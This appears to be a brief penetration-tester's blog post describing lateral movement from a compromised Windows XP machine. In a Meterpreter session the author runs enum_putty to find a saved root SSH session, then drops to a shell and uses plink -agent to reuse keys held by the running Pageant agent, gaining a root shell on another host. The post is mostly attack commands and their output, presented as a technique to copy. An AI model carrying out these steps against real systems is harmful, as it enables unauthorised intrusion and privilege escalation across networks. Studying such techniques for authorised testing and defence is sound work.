Watching Egypt’s talk at DEFCON 20 he mentioned the ability to jump on on a system when pageant (puTTY’s ssh-agent equivalent) is running. So I wanted to figure out the best way to get this going. Here is what I came up with:

meterpreter > run enum_putty
[*] Putty Installed for [["Administrator"]]
[*] Saved SSH Server Public Keys:
[*]     rsa2@22:172.16.10.150
[*] Session corp_webserver:
[*]     Protocol: SSH
[*]     Hostname: 172.16.10.150
[*]     Username: root
[*]     Public Key:
meterpreter >

Awesome, this guy runs as root and we have the IP address. But it doesn’t have any public keys listed. That’s ok because Pageant is running.

meterpreter > shell
Process 3364 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\PuTTY>plink -agent root@172.16.10.150
plink -agent root@172.16.10.150
Welcome to Ubuntu 12.04 LTS (GNU/Linux 2.6.39.1-34 i686)
No mail.
Last login: Tue Aug 28 14:15:18 2012 from 172.16.10.100
root@172.16.10.150:~]$ id
uid=0(root) gid=0(root) groups=0(root)

w00t! An extra shell for free!!